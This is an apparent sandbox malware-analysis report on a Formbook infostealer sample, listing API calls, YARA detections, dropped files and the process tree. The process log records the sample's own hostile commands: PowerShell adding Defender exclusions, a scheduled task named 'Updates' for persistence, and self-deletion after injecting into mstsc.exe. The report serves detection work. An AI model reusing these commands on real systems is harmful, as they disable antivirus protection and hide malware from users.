Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011397A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011396E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139950 NtQueueApcThread,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011399D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139820 NtEnumerateKey,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0113B040 NtSuspendThread,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011398A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139B00 NtSetValueKey,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0113A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139A10 NtQuerySection,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0113AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139560 NtWriteFile,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011395F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0113A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_0113A770 NtOpenThread,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139770 NtSetInformationFile,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139760 NtOpenProcess,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139650 NtQueryValueKey,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_01139670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe | Code function: 9_2_011396D0 NtCreateKey,
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 23_2_04FC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEA060 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEA110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AE9FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AE9F30 NtCreateFile,
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 0_2_0181C2B0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 0_2_01819990
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00401030
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0041E1A2
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00402D90
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00409E40
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_00402FB0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FF900
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01114120
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1002
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110B090
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011220A0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C20A8
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C28EC
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C2B28
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112EBB0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BDBD2
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C22AE
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C2D07
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F0D20
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C1D55
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01122581
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C25DD
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110D5E0
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110841F
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BD466
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C1FF1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BD616
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01116E30
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05051D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9D5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F80D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8F900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBEBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AEE1A2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD2D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD9E40
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_00AD2FB0
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe 8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: String function: 04F8B150 appears 35 times
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Code function: String function: 010FB150 appears 35 times
          Source: Ms5nQdSz5l.exe, 00000000.00000002.272067090.000000000C130000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.272067090.000000000C130000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000000.223690013.0000000000CF2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInvalidCastException.exe> vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.242851987.0000000001380000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.270256208.000000000C030000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000009.00000002.376511036.00000000006D2000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInvalidCastException.exe> vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000009.00000003.244547580.000000000104F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe, 00000009.00000002.392045961.00000000030C3000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemstsc.exej% vs Ms5nQdSz5l.exe
          Source: Ms5nQdSz5l.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.502856017.0000000003130000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.388008675.0000000001400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.492458360.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.379229616.0000000000C70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.503223323.0000000003160000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.374453339.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.250065201.00000000040A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.Ms5nQdSz5l.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Ms5nQdSz5l.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: zFVxYeAVOjnwuB.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.evad.winEXE@19/19@2/1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe File created: C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6444:120:WilError_01
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_01
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe File created: C:\Users\user\AppData\Local\Temp\tmp7635.tmp
          Source: Ms5nQdSz5l.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Ms5nQdSz5l.exe Virustotal: Detection: 26%
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe File read: C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: unknown Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zFVxYeAVOjnwuB' /XML 'C:\Users\user\AppData\Local\Temp\tmp7635.tmp'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Process created: C:\Users\user\Desktop\Ms5nQdSz5l.exe C:\Users\user\Desktop\Ms5nQdSz5l.exe
          Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Ms5nQdSz5l.exe'
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Ms5nQdSz5l.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
